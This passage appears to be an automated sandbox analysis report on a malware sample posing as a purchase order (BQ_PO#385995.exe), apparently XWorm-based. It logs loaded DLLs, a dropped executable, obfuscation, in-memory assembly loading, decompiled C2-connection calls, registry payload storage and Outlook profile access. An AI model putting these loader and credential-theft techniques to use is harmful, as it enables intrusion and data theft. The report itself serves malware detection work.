Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BQ_PO#385995.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: BQ_PO#385995.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BQ_PO#385995.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: MSBuild.exe, 00000003.00000002.4618727811.00000000079B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WER2620.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb` source: WER2620.tmp.dmp.7.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256R source: MSBuild.exe, 00000003.00000002.4617701971.0000000007330000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\PC\Desktop\XWorm V3.1\XWorm V3.1\XWorm V3.1\Dark Worm\Plugins\Recovery\Recovery\obj\Debug\Recovery.pdb source: MSBuild.exe, 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2620.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER2620.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WER2620.tmp.dmp.7.dr

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Messages.cs .Net Code: Memory
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Messages.cs .Net Code: Memory
Source: 3.2.MSBuild.exe.7240000.2.raw.unpack, AssemblyLoader.cs .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, AssemblyLoader.cs .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 3.2.MSBuild.exe.7330000.3.raw.unpack, DynamicUtils.cs .Net Code: CreateSharpArgumentInfoArray
Source: 3.2.MSBuild.exe.7330000.3.raw.unpack, LateBoundReflectionDelegateFactory.cs .Net Code: CreateDefaultConstructor
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447752B push ebx; iretd 0_2_00007FFD3447756A
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34475601 push eax; ret 0_2_00007FFD344756DB
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34478E9A pushad ; iretd 0_2_00007FFD34478EB9
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447D235 push es; iretd 0_2_00007FFD3447D246
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34472400 push eax; ret 0_2_00007FFD344756DB
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34550002 push esp; retf 4810h 0_2_00007FFD34550312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_086176B0 pushfd ; iretd 8_2_086176B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B44277 push ebx; ret 11_2_04B442DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B46338 push eax; ret 11_2_04B46341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B42CA5 push 04B807B3h; retf 11_2_04B42CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B42C5C push 04B807B3h; retf 11_2_04B42CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B43ACD push ebx; retf 11_2_04B43ADA
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01019C30 push esp; retf 0104h 14_2_01019D55
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989233 push es; ret 14_2_06989244
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\ubygsn.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Stores large binary data to the registry
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\665C3A84D83DA1955753 97D084DBAF65E0395221928BE84907C5DFC51D8E0B9D8C8CAD659E49E821BD61 Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
